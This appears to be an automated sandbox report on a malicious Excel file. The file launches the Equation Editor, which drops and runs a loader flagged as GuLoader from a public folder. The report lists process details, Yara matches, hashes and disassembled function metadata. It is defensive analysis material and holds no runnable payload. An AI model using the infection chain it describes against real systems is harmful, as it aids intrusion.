Sep 15, 2021 11:06:58.639786959 CEST	16	IN	Data Raw: 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e 01 0b 5e ff f7 a3 2d fb fd e8 75 98 76 5d b1 18 8f 88 10 71 a3 56 d7 99 9f 17 97 99 76 3b 52 4a f2 a8 5e 71 10 64 07 9c ea 5d d7 Data Ascii: ^^^^^^^^^^^^^^-uv]qVv;RJ^qd]IEv\n_Uv]mb8%S.Uv]^qv]_hunv]L}'V)v\1v]Q5=w]jvv]^qv]V)r\*Z#v]Vr\

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2132 Parent PID: 596

General

Start time:	11:06:26
Start date:	15/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f3b0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1868 Parent PID: 596

General

Start time:	11:06:49
Start date:	15/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2228 Parent PID: 1868

General

Start time:	11:06:51
Start date:	15/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	122880 bytes
MD5 hash:	451E4CD68C69C2C8B8FC93AD02E8754A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, Virustotal, Browse Detection: 21%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 1184 Parent PID: 2228

General

Start time:	11:08:09
Start date:	15/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	122880 bytes
MD5 hash:	451E4CD68C69C2C8B8FC93AD02E8754A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2228 Parent PID: 1868 vbc.exeCOMMON

Executed Functions

Function 003D0EAE, Relevance: 17.4, APIs: 4, Strings: 5, Instructions: 1652COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
6G=M, xrefs: 003D0BFE
+0, xrefs: 003D48BF
m4D$, xrefs: 003D0822
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 6G=M$m4D$$n3,$+0$]Q
API String ID: 2167126740-1892095540
Opcode ID: 7e94923cc112fa0ed03d4c7b23ff57351c669b345fb042e5d2d2dd4ea120358c
Instruction ID: 12239c5ea7266e621790dc696b2b533913299e92bcee8df5aa66812cc12bf1ab
Opcode Fuzzy Hash: 7e94923cc112fa0ed03d4c7b23ff57351c669b345fb042e5d2d2dd4ea120358c
Instruction Fuzzy Hash: 40E233726043899FDB759F38DC957EA7BA2BF54310F56812EEC899B310D7309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003D26BE, Relevance: 11.5, APIs: 1, Strings: 5, Instructions: 1039COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
;E, xrefs: 003D556B
6G=M, xrefs: 003D0BFE
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 6G=M$n3,$+0$;E$]Q
API String ID: 2167126740-1292725159
Opcode ID: 59b491c5af99e91db73ddfeb57e2bd1b1c95e085e6d813319fc3a92cee95812f
Instruction ID: 4d7e60f917158695b8bffab2626e45ad0c5ff9f8c04bc63d5e1e2946876edf04
Opcode Fuzzy Hash: 59b491c5af99e91db73ddfeb57e2bd1b1c95e085e6d813319fc3a92cee95812f
Instruction Fuzzy Hash: 0F92F0B26043899FDB759F39DC957EA7BA2FF54300F55812EEC899B210D7309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003D5D1F, Relevance: 11.3, APIs: 2, Strings: 4, Instructions: 775memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 003D78EF: LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 003D5EE3

Strings

VTQ, xrefs: 003D5D3C
]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: VTQ$n3,$+0$]Q
API String ID: 2616484454-2195837149
Opcode ID: 8cdca8cfa3edac036aa8c5b5b2f682ccb5c1d3d60df80864ca9f43a31c32f3bb
Instruction ID: 32467d9d9d48f02299e4188eab3234128d16e6d2f6cc7b72b227660c198630b5
Opcode Fuzzy Hash: 8cdca8cfa3edac036aa8c5b5b2f682ccb5c1d3d60df80864ca9f43a31c32f3bb
Instruction Fuzzy Hash: 9B62F0B26003899FDB759F39DC957EABBB2FF55310F55811ADC8A9B210C7309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003D8C0F, Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1111COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
IQW, xrefs: 003D901A
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: n3,$+0$IQW$]Q
API String ID: 3389902171-155020291
Opcode ID: 3717464a813d2a5f932d879433d5201c3884948d7cdebaf12098151d359842b7
Instruction ID: c8640a2fff76fcecf8ca8cba2523009f47a9225378d2c38fbf9387f56eca22d3
Opcode Fuzzy Hash: 3717464a813d2a5f932d879433d5201c3884948d7cdebaf12098151d359842b7
Instruction Fuzzy Hash: C4B222726043858FDB75CF38DC997DABBA2BF56310F56825ADC898F255D3308A81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D4266, Relevance: 9.5, APIs: 1, Strings: 4, Instructions: 769COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
/ej3, xrefs: 003D44D7
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: /ej3$n3,$+0$]Q
API String ID: 0-3767694295
Opcode ID: 16a3954165c228f86773c19965fb29334d284a850e101bdfc92048ef320772f9
Instruction ID: 5698e5c11e9434181cfb1efc09c2dcfc8bc38bb2b39d549540a89ab263133c69
Opcode Fuzzy Hash: 16a3954165c228f86773c19965fb29334d284a850e101bdfc92048ef320772f9
Instruction Fuzzy Hash: 6B72F0726003899FCB758F39DC957EABBB2FF59300F51812ADD8A9B610D7309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 003D8464, Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 593libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

Strings

V}pP, xrefs: 003D8640
V}pP, xrefs: 003D8645
6G=M, xrefs: 003D0BFE
m4D$, xrefs: 003D0822

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: 6G=M$V}pP$V}pP$m4D$
API String ID: 1029625771-3215036641
Opcode ID: 7fe8a96e9a498e17893aebe8cfa8c5f39318e5fa08c46021c90ce402e7753076
Instruction ID: c27694d91530b73bda962e1c45b7799ea89adcd480f472d3e3efdb7de90bd892
Opcode Fuzzy Hash: 7fe8a96e9a498e17893aebe8cfa8c5f39318e5fa08c46021c90ce402e7753076
Instruction Fuzzy Hash: 4D3212B2A043499FCB36DF28E9957EA77A6AF58340F55412FDC8D9B300D7309A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003D4523, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 677COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$+0$]Q
API String ID: 0-2968822842
Opcode ID: 5a5737eece46e032c266f13d0b7b1bce8c398d373ccfa83cc004f047144bfa77
Instruction ID: acffde635165102d1e6c222d6aeff42ce299ba7084a2e5da656e6a8f76d6a81e
Opcode Fuzzy Hash: 5a5737eece46e032c266f13d0b7b1bce8c398d373ccfa83cc004f047144bfa77
Instruction Fuzzy Hash: B6520FB26003899FCB759F39DC957DABBB2FF55300F55812AD8899B220D7309A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 003D46DE, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 616COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$+0$]Q
API String ID: 0-2968822842
Opcode ID: 71dcb4559ec25d2a28438fa42132ec47290a12b86a73e625e8d2b07b122e0937
Instruction ID: f99c715ee1d5d83e6b6cb6ebd3c17c2b348b42d50a95c4aa6b874d88b1d94f4f
Opcode Fuzzy Hash: 71dcb4559ec25d2a28438fa42132ec47290a12b86a73e625e8d2b07b122e0937
Instruction Fuzzy Hash: 4A42FEB26002899FCB759F38D8957DABBB2FF55310F55812ADC899B220D7309A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 003D469F, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$+0$]Q
API String ID: 0-2968822842
Opcode ID: cfded6d2e7544dd202c81d672388b473b7392d8721aba761a19f0ed0d2af84e8
Instruction ID: d7a2a07f197be23594ba1c93847ebf99025a00434bfb323957f245e5bdfa57b8
Opcode Fuzzy Hash: cfded6d2e7544dd202c81d672388b473b7392d8721aba761a19f0ed0d2af84e8
Instruction Fuzzy Hash: EA42FEB26043899FCB759F39D8957DABBB2FF55300F55812ADC899B220D7309A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 003D46F9, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 595COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$+0$]Q
API String ID: 0-2968822842
Opcode ID: e5f3679cc567e9304f87228a8b3f5b3630f237f5002a5d824e5ac2b143fd63dc
Instruction ID: c10498476c39e679336e32812bc194390201c96100e9ee27b540d6fd08067a22
Opcode Fuzzy Hash: e5f3679cc567e9304f87228a8b3f5b3630f237f5002a5d824e5ac2b143fd63dc
Instruction Fuzzy Hash: B042FFB26002899FCB759F38DC957EABBB2FF55310F55812ADC899B214D7309A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 003D4835, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$+0$]Q
API String ID: 0-2968822842
Opcode ID: 0dd3dd2a58168300926295fda0f2e169e81b8eda3795b38e2dd12775b16bcadc
Instruction ID: 49ab337f72cbcc76b98936dd9e9ffda35144895f77fb2e003fe738d0f2d046e4
Opcode Fuzzy Hash: 0dd3dd2a58168300926295fda0f2e169e81b8eda3795b38e2dd12775b16bcadc
Instruction Fuzzy Hash: B0320EB26003899FCB759F38DC957DABBB2FF55310F55812AD8898B220D7319A91CF42

Uniqueness

Uniqueness Score: -1.00%

Function 003D48F4, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 528COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
+0, xrefs: 003D48BF
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$+0$]Q
API String ID: 0-2968822842
Opcode ID: 908a240002eece93eab7320ad821929f959ad102b598b9c0084a2f76ec5e5117
Instruction ID: a1d75bf18a0d382c7421ee4428ba49d1cd02cc7615361106b9d2cf6ff6ab7618
Opcode Fuzzy Hash: 908a240002eece93eab7320ad821929f959ad102b598b9c0084a2f76ec5e5117
Instruction Fuzzy Hash: 4F22FFB26002899FCB758F38DC957EA7BB2FF59310F55812ADC899B220D7749A81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D7FFF, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

Strings

s6FH, xrefs: 003D81A9
GIqI, xrefs: 003D8140
`, xrefs: 003D8160

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: GIqI$`$s6FH
API String ID: 1029625771-1584939472
Opcode ID: aa0e5daa8052a0a1a9db1d8769cb39b5b973d35b3fd99b96529915e74d26c810
Instruction ID: 1ed7463a8e151a2eae5532d450de05e2d35786394c9e7dd8e0429fd8f805aa94
Opcode Fuzzy Hash: aa0e5daa8052a0a1a9db1d8769cb39b5b973d35b3fd99b96529915e74d26c810
Instruction Fuzzy Hash: 275134776083489FCF359F28AD9A3DD37A2AF50360F56402BEC499B300DB745A818B02

Uniqueness

Uniqueness Score: -1.00%

Function 003D491A, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 520COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$]Q
API String ID: 0-2998139792
Opcode ID: ddb07a57e633d533123a111178e8258877ab3f43db21ac8231a1dc54a01422dd
Instruction ID: bdd2d4075d1c7a5a824b86b93cc62ad48bd0c3378f03c7656bc76adbff750afa
Opcode Fuzzy Hash: ddb07a57e633d533123a111178e8258877ab3f43db21ac8231a1dc54a01422dd
Instruction Fuzzy Hash: 5A220FB26002899FCB758F38DC957EA7BB2FF58310F55812ADC899B220D7749A81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D493B, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

]Q, xrefs: 003D4949
n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,$]Q
API String ID: 0-2998139792
Opcode ID: d1934ce351df4f5a059bf45c701159335bf2f581ff99eba788c6256ec1bae9cf
Instruction ID: 99dfcdf3ac8293df06090d9c2e869bc4d6a4363244e57f6e90b5ab8ae2cd3c45
Opcode Fuzzy Hash: d1934ce351df4f5a059bf45c701159335bf2f581ff99eba788c6256ec1bae9cf
Instruction Fuzzy Hash: 0D2200B26002899FCB758F38DC957EA7BB2FF58310F55812ADC899B214D7749A81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D0DDF, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

8Q,s, xrefs: 003D0E6D

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 8Q,s
API String ID: 0-2308440317
Opcode ID: e960fd193d5d3380f5adfc18641f5f18598ed9fe864e66c03cf893d226d0d8f5
Instruction ID: 2c6a36131addf3cc840b8321c2e2f6b9a804d50234af4254c289f43e389e360b
Opcode Fuzzy Hash: e960fd193d5d3380f5adfc18641f5f18598ed9fe864e66c03cf893d226d0d8f5
Instruction Fuzzy Hash: BD1233726043898FDB369F39D8597EE7BA2AF85310F16852FDC898B351D7319A41CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D0E3C, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

8Q,s, xrefs: 003D0E6D

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: 8Q,s
API String ID: 2616484454-2308440317
Opcode ID: 95bef1dd7137f1cdd9c5adebf38859d9ec3bf69d0b054d08194d188e5b7e813c
Instruction ID: 09a09a1f2bf4c6fc7f07b562d111df274ee58d4dc3c7069489c8287dcbc2f660
Opcode Fuzzy Hash: 95bef1dd7137f1cdd9c5adebf38859d9ec3bf69d0b054d08194d188e5b7e813c
Instruction Fuzzy Hash: F40263726043899FDB359F38DC597EE7BA2AF85310F16812EEC898B344D7319A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003D10BD, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 330serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 003D78EF: LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

CloseServiceHandle.ADVAPI32(?,00000000), ref: 003D14FB

Strings

U, xrefs: 003D10BF

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleLibraryLoadService
String ID: U
API String ID: 2142486359-3372436214
Opcode ID: e7971944fea1b61926719dc5ebfddc81f9fb35659be56c05bd2109dea646986a
Instruction ID: 9c76ab55bd11ecb5d0b9dc82bb66c873333fd44bded32d6309e5759ac5724f1a
Opcode Fuzzy Hash: e7971944fea1b61926719dc5ebfddc81f9fb35659be56c05bd2109dea646986a
Instruction Fuzzy Hash: C3D16272A043899FDB319F38D8597EE7BA2AF95310F56811FEC899B344D7319A41CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D0746, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON

Download Yara Rule

APIs

EnumWindows.USER32(003D0819,?,00000000,2C5085B2,003D9D9B,-F2E35506,?), ref: 003D0781

Strings

6G=M, xrefs: 003D0BFE
m4D$, xrefs: 003D0822

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: 6G=M$m4D$
API String ID: 1129996299-2490449572
Opcode ID: f01ac9923721a60518b926d5939ca653dda0598cc29d8837dcc9eadfc86f89f3
Instruction ID: 43ca617b77e64b97f1b562950d2b666109073e54b8df792a8739873c76db2ef6
Opcode Fuzzy Hash: f01ac9923721a60518b926d5939ca653dda0598cc29d8837dcc9eadfc86f89f3
Instruction Fuzzy Hash: DAC12FB26043498FDB759F78DC957EA77A6AFA8340F01402FEC88EB311D7309A458B51

Uniqueness

Uniqueness Score: -1.00%

Function 003D3A50, Relevance: 5.5, Strings: 4, Instructions: 468COMMON

Download Yara Rule

Strings

K159, xrefs: 003D3B3B
[(~6, xrefs: 003D3A8C
j>3i, xrefs: 003D3CC5
6G=M, xrefs: 003D0BFE

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 6G=M$K159$[(~6$j>3i
API String ID: 0-1355775559
Opcode ID: 73990ae15d88c127aa83a1a365d3fcafe92dd346d9aefa3e85876387703e21bc
Instruction ID: c9461b3b02699c52beed00b9707789f6bb2520e31015497be1650f0bb764788b
Opcode Fuzzy Hash: 73990ae15d88c127aa83a1a365d3fcafe92dd346d9aefa3e85876387703e21bc
Instruction Fuzzy Hash: C30254B26043458FDB259F38DD987EA77E6BF68340F12412EEC899B315D7309A80CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D49BB, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 502COMMON

Download Yara Rule

Strings

n3,, xrefs: 003D4AD3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n3,
API String ID: 0-1175476618
Opcode ID: 4d2d15407f1b1fc70eea21450266ba411433e67be06f3962d4e7457d93805aa0
Instruction ID: 01b50df620258c09a4b969f92620da7dbf47fe696336e4ed3ed42643321986b7
Opcode Fuzzy Hash: 4d2d15407f1b1fc70eea21450266ba411433e67be06f3962d4e7457d93805aa0
Instruction Fuzzy Hash: 4222F0B26003899FCB759F38DC957EA7BB2FF59340F55812ADC898B220D7319A81CB45

Uniqueness

Uniqueness Score: -1.00%

Function 003D9AB0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

n, xrefs: 003D9AD0

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n
API String ID: 0-2013832146
Opcode ID: 0dbe9aa8ec845016db871b32ca8f5542259a6ce74ad3c5162a3bf8e23263520e
Instruction ID: a815341ee496cf5208d5e2329d4b25d100916f77cf7d24c74bcdffa3e635f77e
Opcode Fuzzy Hash: 0dbe9aa8ec845016db871b32ca8f5542259a6ce74ad3c5162a3bf8e23263520e
Instruction Fuzzy Hash: 0171AB72605388CFDF7A9F28D9987DA3BA5AF65311F12412BDC0ADB710D7309B448B45

Uniqueness

Uniqueness Score: -1.00%

Function 003D59A3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,11317FB7), ref: 003D5B82

Strings

>.S, xrefs: 003D5A1D

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: >.S
API String ID: 823142352-4241473678
Opcode ID: 1c7a5245028ac7726036180693fcb80400fdf9226acd08a36b2de4cd5eb73b91
Instruction ID: c853db318a07184fb2eb9794143cb0ea310fccea434f4460699ad3410e176637
Opcode Fuzzy Hash: 1c7a5245028ac7726036180693fcb80400fdf9226acd08a36b2de4cd5eb73b91
Instruction Fuzzy Hash: 3C4178725197998FCB36DF3189913DF7BA2BF49380F46816EDC889B655E3300642DB06

Uniqueness

Uniqueness Score: -1.00%

Function 003D0F57, Relevance: 3.4, APIs: 2, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad03ca586a7f1264b366b5ead7575af7685180723798bd74a9caafa3dd484bd
Instruction ID: af1ae32cda7eeefaf97062863e556fbfb1e85b56baa8c3aed9b52c9c4ac71800
Opcode Fuzzy Hash: cad03ca586a7f1264b366b5ead7575af7685180723798bd74a9caafa3dd484bd
Instruction Fuzzy Hash: FDF156726043899FDB359F38D9597EE7BA2AF85300F15852FDC888B351D7319A41CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D1077, Relevance: 3.4, APIs: 2, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f8c2437a416ca9dc19c5bae787c023b293ff4c89a0d5ae31a5fc14aada9e91
Instruction ID: 9ded634b37738c183c74f2685b0aaa760cbfd067a637f7b3b64e4c35fcca48c0
Opcode Fuzzy Hash: f9f8c2437a416ca9dc19c5bae787c023b293ff4c89a0d5ae31a5fc14aada9e91
Instruction Fuzzy Hash: 43E186726043899FDB319F38D9597EE7BA2AF95310F56802FDC898B340D7319A42CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D11C7, Relevance: 3.3, APIs: 2, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5682631b705742f82cbfe0cc8b55d9a7470b228bbdef07fe401777694be5293a
Instruction ID: 2295fbbac5bb6771e4d41dbb8970c0f10837155b3d24a6a9345232cae1c021ee
Opcode Fuzzy Hash: 5682631b705742f82cbfe0cc8b55d9a7470b228bbdef07fe401777694be5293a
Instruction Fuzzy Hash: A6D199725043899FCB329F3898593EE7BA2AF55310F56856FDC898B351D7329A42CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D2F96, Relevance: 3.3, Strings: 2, Instructions: 788COMMON

Download Yara Rule

Strings

b'$, xrefs: 003D35CE
6G=M, xrefs: 003D0BFE

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: 6G=M$b'$
API String ID: 1029625771-2592161918
Opcode ID: 451ad7b7483db47ce22d8dcf2c6b28f9b63d64c414b602a8d42233d3284deb09
Instruction ID: 0a247a2cbc71d9c72533e6be148835ecd70fc532bfb0bf9edde8efc7b93dce88
Opcode Fuzzy Hash: 451ad7b7483db47ce22d8dcf2c6b28f9b63d64c414b602a8d42233d3284deb09
Instruction Fuzzy Hash: CB62CCB26043499FCB25DF28D895BEAB7E5BF58350F06412EEC889B701D730AA418B91

Uniqueness

Uniqueness Score: -1.00%

Function 003D1303, Relevance: 3.2, APIs: 2, Instructions: 242serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000), ref: 003D14FB

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: f6d35e3b35a6d9a6883cfdc53da39459e408456007c1910ae44529e9a31af2c9
Instruction ID: 38b05ceb759ec05ad13c23d50cbdfa5674b83054cb79609b1d67831d72350ed2
Opcode Fuzzy Hash: f6d35e3b35a6d9a6883cfdc53da39459e408456007c1910ae44529e9a31af2c9
Instruction Fuzzy Hash: C0A1CB3350438A9FCB369F3498993EE7BA2AF51310F5A816FDC899B751C7315A42CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D4B39, Relevance: 1.9, APIs: 1, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878adcf220ccc2e1e7099ce052bbe3d936b5c220463e85974d028992b6116ca7
Instruction ID: d99fa37376b5d92f8b28fe0ed511aac623aa1bd1f49c26d684f62f57dbe0a380
